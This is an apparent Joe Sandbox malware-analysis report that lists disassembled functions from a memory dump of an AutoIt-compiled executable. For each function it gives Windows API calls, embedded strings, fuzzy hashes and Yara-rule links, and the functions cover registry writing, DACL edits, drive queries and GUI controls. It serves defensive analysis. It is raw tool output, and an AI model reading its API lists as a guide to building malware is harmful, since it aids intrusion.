Opcode Fuzzy Hash: cde8d1ed20af1e50b3bbbb4b9dbc2a2da497b6437412d6667c166bd855f65495
Instruction Fuzzy Hash: 0AB17E71A00215BFEB14DFA8DC86EAE7BB9EB08710F104554F919EB2A1DB70ED40CB64

Function 00B14ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B14AED
GetDriveTypeW.KERNEL32(?,00B3CB68,?,\\.\,00B3CC08), ref: 00B14BCA
SetErrorMode.KERNEL32(00000000,00B3CB68,?,\\.\,00B3CC08), ref: 00B14D36

Strings

SCSI, xrefs: 00B14C8A
\\.\, xrefs: 00B14B3F
ATA, xrefs: 00B14C98
SSD, xrefs: 00B14C4A
Fibre, xrefs: 00B14CAD
Removable, xrefs: 00B14C10, 00B14C15
RAMDisk, xrefs: 00B14BF4
FileBackedVirtual, xrefs: 00B14CEC
CDROM, xrefs: 00B14BFB
ATAPI, xrefs: 00B14C91
Network, xrefs: 00B14C02
MMC, xrefs: 00B14CDE
SATA, xrefs: 00B14CD0
Unknown, xrefs: 00B14BED, 00B14C83
USB, xrefs: 00B14CB4
Virtual, xrefs: 00B14CE5
SAS, xrefs: 00B14CC9
1394, xrefs: 00B14C9F
iSCSI, xrefs: 00B14CC2
SSA, xrefs: 00B14CA6
PhysicalDrive, xrefs: 00B14B76
Fixed, xrefs: 00B14C09
RAID, xrefs: 00B14CBB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2782d6ae76f12ef417bc7b157533cf355b53bb24c34247b3136e41f5e64a7e16
Instruction ID: aa5e35480434087a806baf32da070a510cc5be5324fdf25e885a76947ab3c825
Opcode Fuzzy Hash: 2782d6ae76f12ef417bc7b157533cf355b53bb24c34247b3136e41f5e64a7e16
Instruction Fuzzy Hash: 8461B030605106EBCB04DF24CAC1DEDB7E0EB46740BA484E5F806AB2A1DB39ED81DB81

Function 00B373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B37421
SetTextColor.GDI32(?,?), ref: 00B37425
GetSysColorBrush.USER32(0000000F), ref: 00B3743B
GetSysColor.USER32(0000000F), ref: 00B37446
CreateSolidBrush.GDI32(?), ref: 00B3744B
GetSysColor.USER32(00000011), ref: 00B37463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B37471
SelectObject.GDI32(?,00000000), ref: 00B37482
SetBkColor.GDI32(?,00000000), ref: 00B3748B
SelectObject.GDI32(?,?), ref: 00B37498
InflateRect.USER32(?,000000FF,000000FF), ref: 00B374B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B374CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00B374DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B3752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B37554
InflateRect.USER32(?,000000FD,000000FD), ref: 00B37572
DrawFocusRect.USER32(?,?), ref: 00B3757D
GetSysColor.USER32(00000011), ref: 00B3758E
SetTextColor.GDI32(?,00000000), ref: 00B37596
DrawTextW.USER32(?,00B370F5,000000FF,?,00000000), ref: 00B375A8
SelectObject.GDI32(?,?), ref: 00B375BF
DeleteObject.GDI32(?), ref: 00B375CA
SelectObject.GDI32(?,?), ref: 00B375D0
DeleteObject.GDI32(?), ref: 00B375D5
SetTextColor.GDI32(?,?), ref: 00B375DB
SetBkColor.GDI32(?,?), ref: 00B375E5

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 929cfa7d4ab916866e7e492c49b0aabfeb82bc62ab841ff1b9f2f87f72f8bd00
Instruction ID: aa7383f9480a977e2757e91727bb9c47e23097a32de8f9fbfed9978cac7c4882
Opcode Fuzzy Hash: 929cfa7d4ab916866e7e492c49b0aabfeb82bc62ab841ff1b9f2f87f72f8bd00
Instruction Fuzzy Hash: 80616A72900218AFDF119FA4DC49EEEBFB9EB08320F214155F915BB2A1DB75A940DB90

Function 00B30FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B31128
GetDesktopWindow.USER32 ref: 00B3113D
GetWindowRect.USER32(00000000), ref: 00B31144
GetWindowLongW.USER32(?,000000F0), ref: 00B31199
DestroyWindow.USER32(?), ref: 00B311B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B311ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B3120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B3121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00B31232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B31245
IsWindowVisible.USER32(00000000), ref: 00B312A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B312BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B312D0
GetWindowRect.USER32(00000000,?), ref: 00B312E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00B3130E
GetMonitorInfoW.USER32(00000000,?), ref: 00B31328
CopyRect.USER32(?,?), ref: 00B3133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00B313AA

Strings

(, xrefs: 00B3131B
tooltips_class32, xrefs: 00B311E6
0, xrefs: 00B310D3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
Instruction ID: f1491cb685e7be85f2bef20a734a28651aa3c35138805a40feca7f3089243570
Opcode Fuzzy Hash: 0ebf12fafd7e2e639366b1959a5e5b2137d13b965ebd020526d899df6447211a
Instruction Fuzzy Hash: EBB17C71604341AFD704DF68C985B6FBBE8FF85350F108958F999AB2A1CB31E844CBA1

Function 00B30241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B302E5
_wcslen.LIBCMT ref: 00B3031F
_wcslen.LIBCMT ref: 00B30389
_wcslen.LIBCMT ref: 00B303F1
_wcslen.LIBCMT ref: 00B30475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B304C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B30504

Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD

Part of subcall function 00B0223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B02258
Part of subcall function 00B0223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B0228A

Strings

SELECT, xrefs: 00B30548
SELECTCLEAR, xrefs: 00B3052D
GETSUBITEMCOUNT, xrefs: 00B30384, 00B3039F
ISSELECTED, xrefs: 00B304DD
SELECTINVERT, xrefs: 00B3057E
GETITEMCOUNT, xrefs: 00B30316, 00B30337
GETSELECTEDCOUNT, xrefs: 00B30470, 00B3048B
DESELECT, xrefs: 00B3059C
VIEWCHANGE, xrefs: 00B30675
GETSELECTED, xrefs: 00B305E1
FINDITEM, xrefs: 00B30627
SELECTALL, xrefs: 00B30515
GETTEXT, xrefs: 00B303EC, 00B30407

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: b3c4995ba6b6d22b5ed693ec34f8b3f0a2ed47d456dcd311ca4a4410508ccff9
Instruction ID: 40b451e876e3b6ee317c33f50f5d7247cca0913c06761995e67cbef4a579ce1a
Opcode Fuzzy Hash: b3c4995ba6b6d22b5ed693ec34f8b3f0a2ed47d456dcd311ca4a4410508ccff9
Instruction Fuzzy Hash: 92E1A0312282018FC714EF24C9A196EB7E6FF98714F24499CF8969B3A6DB30ED45CB51

Function 00AB8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB8968
GetSystemMetrics.USER32(00000007), ref: 00AB8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AB899B
GetSystemMetrics.USER32(00000008), ref: 00AB89A3
GetSystemMetrics.USER32(00000004), ref: 00AB89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AB89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AB89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AB8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AB8A3C
GetClientRect.USER32(00000000,000000FF), ref: 00AB8A5A
GetStockObject.GDI32(00000011), ref: 00AB8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB8A81

Part of subcall function 00AB912D: GetCursorPos.USER32(?), ref: 00AB9141
Part of subcall function 00AB912D: ScreenToClient.USER32(00000000,?), ref: 00AB915E
Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000001), ref: 00AB9183
Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000002), ref: 00AB919D

SetTimer.USER32(00000000,00000000,00000028,00AB90FC), ref: 00AB8AA8

Strings

AutoIt v3 GUI, xrefs: 00AB8A20

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 8fd0ef4f08bd4cdd3d003c6d388806437b72ebdc13d163ead8bf824c38a4a7fb
Instruction ID: 7c2d173481e8de47f4fc9db8ef6e4b8cf86487ee16beed05953a8721c30ee8ab
Opcode Fuzzy Hash: 8fd0ef4f08bd4cdd3d003c6d388806437b72ebdc13d163ead8bf824c38a4a7fb
Instruction Fuzzy Hash: D3B16B71A00209AFDF14DFACCD46BEE7BB9FB48314F114229FA15A7291DB34A841CB61

Function 00B00D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00E29
GetLengthSid.ADVAPI32(?), ref: 00B00E40
GetAce.ADVAPI32(?,00000000,?), ref: 00B00E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00E96
GetLengthSid.ADVAPI32(?), ref: 00B00EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00EB5
HeapAlloc.KERNEL32(00000000), ref: 00B00EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00EDD
CopySid.ADVAPI32(00000000), ref: 00B00EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F6E
HeapFree.KERNEL32(00000000), ref: 00B00F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F7E
HeapFree.KERNEL32(00000000), ref: 00B00F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00F8E
HeapFree.KERNEL32(00000000), ref: 00B00F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00B00FA1
HeapFree.KERNEL32(00000000), ref: 00B00FA8

Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
Instruction ID: 3b82d2801aca08d53d167a615eec04e00b986dcc13c59de380610a65774f45a2
Opcode Fuzzy Hash: 5eac7e96c5f6f5a758d2c1ee860c5dee6a93a85fc0a079908af8ea7dc2290ff8
Instruction Fuzzy Hash: E6715B7290020AEBDB20AFA4DC48FAEBFB8FF05301F244195FA59B7191DB719905DB60

Function 00B2C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B3CC08,00000000,?,00000000,?,?), ref: 00B2C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B2C5A4
_wcslen.LIBCMT ref: 00B2C5F4
_wcslen.LIBCMT ref: 00B2C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B2C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B2C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B2C84D
RegCloseKey.ADVAPI32(?), ref: 00B2C881
RegCloseKey.ADVAPI32(00000000), ref: 00B2C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B2C960

Strings

REG_EXPAND_SZ, xrefs: 00B2C5CD
REG_QWORD, xrefs: 00B2C8C3
REG_BINARY, xrefs: 00B2C913
REG_MULTI_SZ, xrefs: 00B2C6F5
REG_DWORD, xrefs: 00B2C804
REG_SZ, xrefs: 00B2C644

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 77097243b82d06a5ffcfc6de554cac3378a7cf2f30ab25a5a9aac2e8f5610094
Instruction ID: 1a4dbdb51c90855f2069d9a0fd21cc94dfd9595b7bafd2d53065c8e3765e5fb2
Opcode Fuzzy Hash: 77097243b82d06a5ffcfc6de554cac3378a7cf2f30ab25a5a9aac2e8f5610094
Instruction Fuzzy Hash: C41278356042119FDB14EF14D991E2EBBE5EF89714F14889CF88A9B3A2DB31ED41CB81

Function 00B3091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B309C6
_wcslen.LIBCMT ref: 00B30A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B30A54
_wcslen.LIBCMT ref: 00B30A8A
_wcslen.LIBCMT ref: 00B30B06
_wcslen.LIBCMT ref: 00B30B81

Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD

Part of subcall function 00B02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B02BFA

Strings

SELECT, xrefs: 00B30D11
ISCHECKED, xrefs: 00B30CE1
UNCHECK, xrefs: 00B30D3E
COLLAPSE, xrefs: 00B30B01, 00B30B1C
EXISTS, xrefs: 00B30B7C, 00B30B97
GETTOTALCOUNT, xrefs: 00B309F2, 00B30A17
GETSELECTED, xrefs: 00B30C4E
EXPAND, xrefs: 00B30BF8
CHECK, xrefs: 00B30A85, 00B30AA0
GETITEMCOUNT, xrefs: 00B30C1E
GETTEXT, xrefs: 00B30C97

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
Instruction ID: 223c2041871d91c53dbc0e987ddcfc94b269ecd9ff45a1bf41b3d5ee708cabf2
Opcode Fuzzy Hash: 517c781cf118395427ac96ab8dffb7335f5ea317bb7e007d751fa46cfa4d73c6
Instruction Fuzzy Hash: CFE19E352183019FC714EF24C5A096AB7E1FF99714F2489ACF8969B3A2DB31ED45CB81

Function 00B2C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
_wcslen.LIBCMT ref: 00B2C9F1
_wcslen.LIBCMT ref: 00B2CA68
_wcslen.LIBCMT ref: 00B2CA9E
_wcslen.LIBCMT ref: 00B2CAF9
_wcslen.LIBCMT ref: 00B2CB2F
_wcslen.LIBCMT ref: 00B2CB7F

Strings

HKCU, xrefs: 00B2CBCE
HKEY_CURRENT_USER, xrefs: 00B2CBBD
HKEY_CLASSES_ROOT, xrefs: 00B2CAF3, 00B2CAF8
HKLM, xrefs: 00B2CA98, 00B2CA9D
HKEY_CURRENT_CONFIG, xrefs: 00B2CB79, 00B2CB7E
HKU, xrefs: 00B2CBF0
HKEY_USERS, xrefs: 00B2CBDF
HKCR, xrefs: 00B2CB29, 00B2CB2E
HKCC, xrefs: 00B2CBAC
HKEY_LOCAL_MACHINE, xrefs: 00B2CA62, 00B2CA67

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
Instruction ID: 79e1a1e8ef10d396728ac4626a540eac3ad9546544b83b75be4aa1ed6b820797
Opcode Fuzzy Hash: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
Instruction Fuzzy Hash: 4971143360013A8BCB20DE7CED515BE3BD1EF65754B2505A8F86E97288EA35CD4583A0

Function 00B3833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B3835A
_wcslen.LIBCMT ref: 00B3836E
_wcslen.LIBCMT ref: 00B38391
_wcslen.LIBCMT ref: 00B383B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B383F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B35BF2), ref: 00B3844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B384CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38501
FreeLibrary.KERNEL32(?), ref: 00B3850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B3851D
DestroyIcon.USER32(?,?,?,?,?,00B35BF2), ref: 00B3852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B38549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B38555

Strings

.dll, xrefs: 00B383AB
.exe, xrefs: 00B38388
.icl, xrefs: 00B38368

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
Instruction ID: dfffb13f4189ad98b1e1a2abc5ae5a877a2663d978d20cfab76abba7aafa3e8b
Opcode Fuzzy Hash: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
Instruction Fuzzy Hash: FF61B071540315BAEB14DF64CC85BBE7BA8FB18B11F204689F815E61D1DF74A984CBA0

Function 00AA7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#pragma compile, xrefs: 00AA77D3
#cs, xrefs: 00AA7873, 00AA78C5
Unterminated group of comments, xrefs: 00AE528C
#OnAutoItStartRegister, xrefs: 00AA7817
Bad directive syntax error, xrefs: 00AE519A
#ce, xrefs: 00AA78ED
', xrefs: 00AE5169
#include, xrefs: 00AA7847
#comments-end, xrefs: 00AA78D9
#comments-start, xrefs: 00AA785F, 00AA78B1
Cannot parse #include, xrefs: 00AE5279
#requireadmin, xrefs: 00AA77FF
", xrefs: 00AE5153
#include-once, xrefs: 00AA782F
#notrayicon, xrefs: 00AA77E7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
